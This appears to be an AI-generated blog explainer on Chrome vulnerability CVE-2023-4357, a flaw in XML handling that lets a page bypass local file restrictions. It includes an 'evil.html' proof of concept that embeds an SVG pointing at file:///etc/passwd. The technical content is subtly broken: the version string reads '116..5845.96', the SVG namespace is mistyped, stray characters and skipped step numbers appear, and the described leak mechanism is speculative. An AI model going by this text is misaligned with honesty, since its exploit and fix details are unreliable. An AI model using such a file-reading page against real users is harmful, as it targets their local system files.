In August 2023, Google patched a medium-severity vulnerability in Chrome: CVE-2023-4357. This bug stems from insufficient validation of untrusted input in XML, letting attackers bypass file access restrictions using a malicious HTML file. In simpler terms, a website could trick Chrome into opening or reading files on your computer that it shouldn't have access to.

Let’s break down what happened, see some code snippets, and understand how an exploit might work.

1. What is CVE-2023-4357?

CVE-2023-4357 is a flaw in how Chrome handles XML processing, especially when user-supplied input is included without proper validation. Chrome’s security relies on sanboxing and access restrictions, preventing websites from freely accessing your files. But due to this bug, a remote attacker could bypass those protections.

Affected versions:
Google Chrome prior to 116..5845.96

Reported as: Chromium Issue 1464237
Google advisory: Chrome Releases: Stable Channel Update for Desktop, 2023-08-15

2. How Did the Vulnerability Work?

Many web technologies use XML for data transfer. If a browser does not strictly check what kind of file is being loaded or how user input is handled in XML contexts, it can end up loading *dangerous* files, such as those from your local file system (file:// URLs).

The Problem

A crafted HTML file could use XML features to inject a file:// reference. Chrome failed to properly block such references in some contexts, especially when nested inside other XML or SVG content.

3. The Exploit - Step by Step

Goal: Read content from a restricted local file via a webpage.

This page loads an SVG or XML with embedded user-controlled data.

3. The data contains a reference to a sensitive local file like file:///etc/passwd or file:///C:/Windows/System32/drivers/etc/hosts.
4. Chrome processes this without proper validation, fetching the file and exposing its contents to the attacker (for example, via onload events or DOM parsing).

Example Code Snippet

Below is a minimal proof of concept showing how an attacker might craft such a page. (Note: This is for educational purposes only!)

<!-- Save as evil.html and serve from a web server -->
<!DOCTYPE html>
<html>
  <body>
    <script>
      // Create an SVG image using a local file reference
      let svgData = `
        <svg xmlns="http://www.w3.org/200/svg">;
          <image href="file:///etc/passwd" width="500" height="500"/>
        </svg>
      `;

      let blob = new Blob([svgData], {type: "image/svg+xml"});
      let url = URL.createObjectURL(blob);

      let img = new Image();
      img.src = url;
      img.onload = function() {
        console.log("SVG loaded - check if file content is present!");
        // In some cases, the file content could leak through error or data events
      };
      document.body.appendChild(img);
    </script>
  </body>
</html>

What happens:
If Chrome allows it (on vulnerable versions), the SVG image tries to load content from a local file. If successful, the contents could be accessed by the attacker's script, especially if the browser fires events with error messages containing file contents, or if the image is rendered on the page.


Note: Modern Chrome blocks many such attempts, but before the fix some edge cases could bypass the restrictions.

4. How Was the Issue Fixed?

Google patched the vulnerability by adding stricter validation in how Chrome processes XML and SVG content referring to local files, so that user-supplied input cannot trigger file:// fetches in unauthorized contexts.

Fixed in:
Chrome 116..5845.96 (August 2023).

Update Chrome: Make sure you’re running version 116 or higher.

- Be careful with suspicious links or attachments, especially those that open local files or ask for special permissions.
- Web developers should also sanitize any user input used in XML, even if browsers now add more protections.

- Chrome Release Note (2023-08-15)
- Chromium Security Bug 1464237 (restricted details)
- CVE-2023-4357 description (NVD)

Summary

CVE-2023-4357 is a reminder of how complex web browser security can be, and how edge cases—like XML processing—can lead to unexpected file leaks. Thanks to quick patching from Google, the danger is minimized, but always keep your browser up-to-date and stay alert when handling files via the web.


*Exclusive post by AI for security learning. Please use this knowledge ethically and stay updated!*

Timeline

Published on: 08/15/2023 18:15:00 UTC
Last modified on: 08/27/2023 03:15:00 UTC